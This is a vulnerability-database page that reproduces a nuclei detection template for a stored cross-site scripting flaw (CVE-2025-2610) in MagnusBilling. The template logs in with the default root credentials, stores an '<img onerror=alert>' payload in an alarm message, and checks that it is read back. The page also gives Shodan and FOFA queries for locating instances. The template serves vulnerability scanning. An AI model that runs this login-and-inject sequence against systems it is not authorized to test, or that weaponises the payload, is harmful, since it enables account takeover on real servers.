Lucene search
K

MagnusBilling Alarm Module - Cross-Site Scripting

๐Ÿ—“๏ธย 02 Jul 2026ย 09:36:57Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 26ย Views

Critical cross-site scripting vulnerability in MagnusBilling allows stored attacks on authenticated users.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-2610
21 Mar 202523:20
โ€“circl
CNNVD
MagnusBilling ๅฎ‰ๅ…จๆผๆดž
21 Mar 202500:00
โ€“cnnvd
CVE
CVE-2025-2610
21 Mar 202522:35
โ€“cve
Cvelist
CVE-2025-2610 MagnusBilling Stored Cross-Site Scripting in Alarm Module
21 Mar 202522:35
โ€“cvelist
EUVD
EUVD-2025-7201
3 Oct 202520:07
โ€“euvd
NVD
CVE-2025-2610
21 Mar 202523:15
โ€“nvd
Positive Technologies
PT-2025-12458
21 Mar 202500:00
โ€“ptsecurity
RedhatCVE
CVE-2025-2610
23 Mar 202523:14
โ€“redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-2610
21 Mar 202500:00
โ€“vulncheck_kev
Vulnrichment
CVE-2025-2610 MagnusBilling Stored Cross-Site Scripting in Alarm Module
21 Mar 202522:35
โ€“vulnrichment
Rows per page
id: CVE-2025-2610

info:
  name: MagnusBilling Alarm Module - Cross-Site Scripting
  author: DhiyaneshDK
  severity: high
  description: |
    Improper neutralization of input during web page generation vulnerability in MagnusSolution MagnusBilling (Alarm Module modules) allows authenticated stored cross-site scripting. This vulnerability is associated with program files protected/components/MagnusLog.Php.This issue affects MagnusBilling- through 7.3.0.
  impact: |
    Authenticated attackers can inject malicious HTML and JavaScript through the alarm module that persists and executes when other administrators view alarm configurations, potentially leading to session hijacking and privilege escalation.
  remediation: |
    Upgrade to MagnusBilling version 7.3.1 or later that properly sanitizes input in the alarm module.
  reference:
    - https://vulncheck.com/advisories/magnusbilling-logs-xss
    - https://chocapikk.com/posts/2025/magnusbilling/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2610
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
    cvss-score: 7.6
    cve-id: CVE-2025-2610
    cwe-id: CWE-79
    epss-score: 0.00896
    epss-percentile: 0.55104
    cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: magnussolution
    product: magnusbilling
    shodan-query: http.html:"magnusbilling"
    fofa-query: body="magnusbilling"
  tags: cve,cve2025,mbilling,xss,magnusbilling,authenticated,vkev,vuln

flow: http(1) && http(2) && http(3) && http(4)

variables:
  username: "root"
  password: "9F4CA770B638615AC5C3E0D2DA16B77C80C2F2C6" # magnus
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST /mbilling/index.php/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user={{username}}&password={{password}}&key=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success")'
        condition: and
        internal: true

  - raw:
      - |
        GET /mbilling/index.php/authentication/check?_dc= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "id_agent")'
        condition: and
        internal: true

  - raw:
      - |
        POST /mbilling/index.php/alarm/save?_dc= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;

        rows={"id":0,"id_plan":0,"type":1,"amount":1,"condition":1,"status":1,"email":"{{email}}","period":3600,"creationdate":null,"subject":"test","message":"<img src=x onerror=alert(document.domain)>"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Operation was successful")'
        condition: and
        internal: true

  - raw:
      - |
        GET /mbilling/index.php/alarm/read?_dc=&page=1&start=0&limit=25 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "<img src=x onerror=alert(document.domain)>", "idPlanname")'
        condition: and
# digest: 4a0a0047304502204e8f7b172f77d2c162de4c8aee6597110d02626d78ec782c2b5d513ef71715a3022100fb801b5a3d84870658e4d44115aba8504aeffc64b9d3efea4a2f1342e69c6dc5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 3.15.4 - 7.6
EPSS0.00896
SSVC
26